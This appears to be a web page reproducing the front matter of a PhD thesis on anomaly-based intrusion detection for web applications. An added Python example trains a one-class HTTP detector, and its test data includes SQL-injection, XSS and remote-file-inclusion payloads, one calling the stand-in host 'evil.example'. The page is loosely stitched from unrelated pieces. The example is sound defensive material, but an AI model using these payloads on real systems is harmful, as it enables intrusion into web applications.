2.3 Intrusion Detection Systems Evaluation


Host and Network based Anomaly Detectors for HTTP Attacks
Davide Ariu
Ph.D. in Electronic and Computer Engineering, Dept. of Electrical and Electronic Engineering, University of Cagliari
Advisor: Prof. Giorgio Giacinto
Curriculum: ING-INF/05 SISTEMI DI ELABORAZIONE DELLE INFORMAZIONI, XXII Cycle, March 2010

To my family...

Abstract

The huge number of people who connect to the Internet every day makes web applications an attractive target for computer criminals. For example, an attack against a web service might be used to spread malware quickly or to steal access credentials from the web service's users. Protecting web applications with Intrusion Detection Systems (IDS) is therefore necessary. Unfortunately, protecting web applications is a tricky task, since they are in general large, complex and highly customized. Traditional signature-based systems cannot guarantee a solid defense, since they are unable to cope with zero-day attacks. Anomaly-based systems are a valid alternative to signature-based ones and also offer protection against zero-day attacks.

In this dissertation we propose several anomaly-based Intrusion Detection Systems for the protection of web applications. We address Intrusion Detection as a Pattern Recognition problem, discussing all the aspects that must be considered in realizing an anomaly-based IDS. The formulation of the problem best suited to web application security is the "one-class" formulation. This formulation builds a statistical model based on legitimate patterns only, ignoring any information about the attacks. With this approach potentially any attack pattern can be detected, provided it is statistically anomalous with respect to the patterns of the target (that is, the legitimate) class. We propose one Host-based and two Network-based IDS. Both Host- and Network-based solutions are effective, though with different scopes: a Host-based IDS is more specific and tailored to protect a particular application, while a Network-based IDS offers the great advantage of being able to monitor the traffic toward an entire network segment. In all of the proposed IDS we employ Multiple Classifiers to increase accuracy and to harden the IDS against evasion attempts. All the IDS have been tested on several datasets of attacks and normal traffic, both private and publicly available. Experimental results confirm the effectiveness of the proposed solutions, in terms of a high detection rate and a small number of false alarms.

Acknowledgements

Understand the things I say, Don't turn away from me. 'Cause I've spent half my life out there, You wouldn't disagree. (D. O'Riordan)

At the end of an amazing experience such as pursuing a Ph.D., there is always somebody to thank. I don't want to escape this unwritten rule, since the last three years have been a school of life before being an unbelievable professional experience. There has been at least one moment in these three years when each of the people I'm going to mention has been very important to me. Thus, to thank them I will simply follow a chronological order.

The first person I would like to thank is Prof. Giorgio Giacinto, as he gave me the possibility of living this experience. I thank him for his valued advice, for his helpfulness and for having been by far more than a simple advisor. The second person I would like to thank is Prof. Fabio Roli, for his exhortations to live research with passion and ambition. I thank both Prof. Giacinto and Prof. Roli for giving me the opportunity to join the PRA group and to begin my Ph.D. with an amazing experience at the Georgia Institute of Technology. The period in Atlanta has certainly been one of the hardest periods of my Ph.D., but I will always remember it as one of the most beautiful moments of my entire life. Many people helped me to have such an enjoyable period there. Certainly without Andrea, Claudio and Roberto (in strict alphabetical order) my American stay wouldn't have had the same taste. I have much appreciated that nice person, Jack A. Lang, who gave me his hospitality with courtesy and helpfulness. There are also other people who in that period showed me their affection even though I was more than six thousand kilometers away. Thanks to everybody. A big thank you to all the PRA people and, above all, to Battista and Luca. I shared with them moments of both hard work and fun, and hours of waiting at the University cafeteria.

Finally, there is my Family. I don't have enough words to explain how much I love them, how thankful I am for their kind support and infinite patience, and how proud I am of them. Without them I certainly wouldn't be who I am, and for this I will be eternally grateful to them.

Ringraziamenti (Acknowledgements, Italian version, translated)

Understand the things I say, Don't turn away from me. 'Cause I've spent half my life out there, You wouldn't disagree. (D. O'Riordan)

At the end of an experience as rich and demanding as a Ph.D., there is always someone to thank. Personally, I have no intention of escaping this unwritten rule, since the last three years have been for me a school of life even before being a fantastic professional experience. Establishing a hierarchy and an order in which to thank all the people to whom I intend to express my gratitude would not be possible, and perhaps not even fair, since there has been at least one moment along this path in which each of them was essential. So as not to wrong anyone, I will therefore simply follow a chronological order.

The first person I must thank is Prof. Giorgio Giacinto, who offered me the possibility of living this experience. I thank him for his precious advice, for having been available every time I asked for his help, and for having been much more than a simple tutor. I thank Prof. Fabio Roli for encouraging me to approach research with passion and ambition. A joint thank you to Prof. Giacinto and Prof. Roli for offering me the possibility of joining the PRA group and of beginning my Ph.D. with an extraordinary period at the Georgia Institute of Technology. The time spent in Atlanta was without doubt one of the most tiring moments of my Ph.D., but I will always remember it as one of the most beautiful and intense moments of my life. That it could be what it was, I owe to several people. Among them Andrea, Claudio and Roberto (in strict alphabetical order), without whose presence the stay in the United States could not have had the same flavor. A separate thank you I owe to Jack Lang, who opened the doors of his own home to me with great courtesy and helpfulness. There are then many other people, whom I do not list explicitly, but who managed to stay close to me even from more than 6000 kilometers away. To all of them, thank you. Thanks to all the people of the PRA group. Among them, with Battista and Luca in particular I had the chance to share, besides hours of hard work, also many amusing moments, including the long hours queuing at the turnstiles of the university canteens.

Finally, the biggest thank you goes without doubt to my Family. Although I believe they know very little about what I do, they have always encouraged and supported me, helping me to recover the balance I had occasionally lost. There are no words that can express my feelings, my gratitude and how proud I am of each of them. If I have been able to reach this goal it is also thanks to the serenity they have always taught me to keep even in the face of difficulties. And for this I can never be grateful enough.

Contents

1 Introduction
  1.1 Contribution of the thesis
  1.2 Organization
2 An Introduction to Intrusion Detection
  2.1 Taxonomy of Intrusion Detection Systems
  2.2 Taxonomy of Attacks
  2.3 Intrusion Detection Systems Evaluation
    2.3.1 ROC Curves
    2.3.2 More on evaluation metrics
3 Pattern Recognition Algorithms for Anomaly Detection
  3.1 One vs. Multi-class Pattern Classification
    3.1.1 Multi-class Pattern Classification
    3.1.2 One-class Pattern Classification
  3.2 Algorithms for pattern classification
    3.2.1 Hidden Markov Models
    3.2.2 One-Class SVM
  3.3 Multiple Classifier Systems
    3.3.1 Classifier Selection
    3.3.2 Classifier Fusion
    3.3.3 Combining Multiple One-Class SVM Classifiers
4 Web Applications Security: a Host-based solution
  4.1 Web Applications: An overview
  4.2 Attacks against Web Applications
    4.2.1 SQL injection
    4.2.2 Cross Site Scripting - XSS
    4.2.3 Remote File Inclusion - Shellcode Injection ...
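The one-class formulation described in the abstract, as an added example that is not code from Ariu's thesis: a model of legitimate HTTP query parameters is fitted from legitimate requests only, any value statistically far from them is reported, two detectors per parameter are fused so that a payload has to look normal to both, and the result is scored as the (detection rate, false alarm rate) pair that a ROC curve point is made of. The thesis uses HMM and one-class SVM models; the two detectors here (value length and character-class distribution, fused by taking the maximum), the /search endpoint with its q and page parameters, and all training and test requests are assumptions constructed for the illustration.

```python
"""One-class anomaly detection over HTTP query parameters.

Added example, not code from the thesis above. Only legitimate requests are
used for training (the "one-class" formulation); anything statistically far
from them is reported, whatever the attack. Endpoint, parameters, detectors
and traffic are all constructed for illustration.
"""
from statistics import mean, pstdev
from urllib.parse import parse_qsl, urlsplit

# Constructed legitimate training traffic for a hypothetical /search endpoint.
LEGIT_TRAIN = [
    "/search?q=cheap+flights&page=1",
    "/search?q=pizza+delivery&page=2",
    "/search?q=weather+forecast&page=1",
    "/search?q=new+york+hotels&page=3",
    "/search?q=used+cars&page=2",
    "/search?q=python+tutorial&page=1",
    "/search?q=running+shoes&page=1",
    "/search?q=laptop+reviews&page=2",
    "/search?q=train+timetable&page=1",
    "/search?q=second+hand+bikes&page=3",
]

# Constructed labelled test traffic (True = attack), shaped like the attack
# classes listed in the thesis contents; not taken from any real dataset.
LABELLED_TEST = [
    ("/search?q=hotels+rome&page=3", False),
    ("/search?q=best+coffee+beans&page=2", False),
    ("/search?q=%27+OR+1%3D1--&page=1", True),                           # SQL injection
    ("/search?q=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&page=1", True),  # XSS
    ("/search?q=http%3A%2F%2Fevil.example%2Fshell.txt&page=1", True),    # remote file inclusion
]

CLASSES = ("alpha", "digit", "space", "other")
DETECTORS = ("length", "chars")


def params(url):
    """Decode the query string into (name, value) pairs."""
    return parse_qsl(urlsplit(url).query, keep_blank_values=True)


def char_classes(value):
    """Fraction of each character class in a value (an empty value scores all zero)."""
    counts = dict.fromkeys(CLASSES, 0)
    for ch in value:
        cls = "alpha" if ch.isalpha() else "digit" if ch.isdigit() else "space" if ch.isspace() else "other"
        counts[cls] += 1
    n = max(len(value), 1)
    return {c: counts[c] / n for c in CLASSES}


def raw_scores(stats, value):
    """Per-detector z-scores against the legitimate model (higher = more anomalous).
    Standard deviations are floored so a constant training feature never divides by zero."""
    length = abs(len(value) - stats["len_mean"]) / max(stats["len_std"], 1.0)
    freq = char_classes(value)
    chars = max(abs(freq[c] - stats["cls_mean"][c]) / max(stats["cls_std"][c], 0.05) for c in CLASSES)
    return {"length": length, "chars": chars}


def train(urls):
    """Fit per-parameter statistics from legitimate requests only: no attack sample is used."""
    values = {}
    for url in urls:
        for name, value in params(url):
            values.setdefault(name, []).append(value)
    model = {}
    for name, vals in values.items():
        lengths = [len(v) for v in vals]
        freqs = [char_classes(v) for v in vals]
        stats = {
            "len_mean": mean(lengths),
            "len_std": pstdev(lengths),
            "cls_mean": {c: mean([f[c] for f in freqs]) for c in CLASSES},
            "cls_std": {c: pstdev([f[c] for f in freqs]) for c in CLASSES},
        }
        # Scale each detector so that 1.0 is the most anomalous *legitimate* training value.
        stats["scale"] = {d: max(max(raw_scores(stats, v)[d] for v in vals), 1.0) for d in DETECTORS}
        model[name] = stats
    return model


def score_request(model, url):
    """Fused request score: the maximum normalised detector score over all parameters."""
    worst = 0.0
    for name, value in params(url):
        if name not in model:
            return float("inf")  # a parameter never seen in legitimate traffic is anomalous in itself
        raw = raw_scores(model[name], value)
        worst = max(worst, *(raw[d] / model[name]["scale"][d] for d in DETECTORS))
    return worst


def evaluate(model, labelled, threshold):
    """(detection rate, false-alarm rate): fraction of attacks, resp. legitimate requests, scored above threshold."""
    hits = [(score_request(model, url) > threshold, is_attack) for url, is_attack in labelled]

    def rate(xs):
        return sum(xs) / len(xs) if xs else 0.0

    return rate([h for h, a in hits if a]), rate([h for h, a in hits if not a])


def roc_points(model, labelled, thresholds):
    """(false-alarm rate, detection rate) pairs over a threshold sweep: the points of a ROC curve."""
    return [evaluate(model, labelled, t)[::-1] for t in thresholds]


if __name__ == "__main__":
    m = train(LEGIT_TRAIN)
    for url, is_attack in LABELLED_TEST:
        print(f"{'ATTACK' if is_attack else 'legit '} score={score_request(m, url):6.2f} {url}")
    print("threshold 1.0 -> (detection rate, false-alarm rate) =", evaluate(m, LABELLED_TEST, 1.0))
    print("ROC points:", roc_points(m, LABELLED_TEST, [0.5, 1.0, 3.0, 10.0]))
```

The SQL-injection value is the one to watch: it is shorter than several legitimate queries, so the length detector alone would pass it, and only the character-class detector reports it; that is the evasion-hardening argument for combining classifiers that the abstract makes. Two caveats for anyone reusing the idea: the 1.0 threshold is the most anomalous training value, so the false alarm rate on the training set is zero by construction and the rate that matters must be estimated on held-out legitimate traffic; and a character-class model is evadable by a payload built from letters only, which is why the thesis fuses models of different kinds rather than relying on one.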
Recommended publications
  • Hacker's Encyclopedia, Logik Bomb (FOA), 1997 Revised Second Edition (listed as "Paradise Lost, Book III, Line 18")
  • Dictionary of Health Information Technology and Security (Marcinko and Hetico, Springer Publishing, 2007)
  • Flexible Infections: Computer Viruses, Human Bodies, Nation-States, Evolutionary Capitalism (Stefan Helmreich)
  • IBM X-Force Threat Insight Quarterly, IBM Security Solutions, May 2011
  • Virus Bulletin, July 1991
  • Building a Global Information Assurance Program (Auerbach Publications)
  • Developing Malware: A SCOT Analysis of the Success of Malware (Erlend Flesjø, ESST, University of Oslo)
  • Virus Bulletin, August 1993
  • Evolution of Cyber Security (Invotra)
  • The Changing Face of INFOSEC, Network World, May-June 2001 (M. E. Kabay)
  • Reducing Risks from Cyber Attacks (Tim Gurganus, NC State University, Cyber Security Awareness Month 2012)
  • Computer Virus Tutorial (Computer Knowledge, 1996-2005)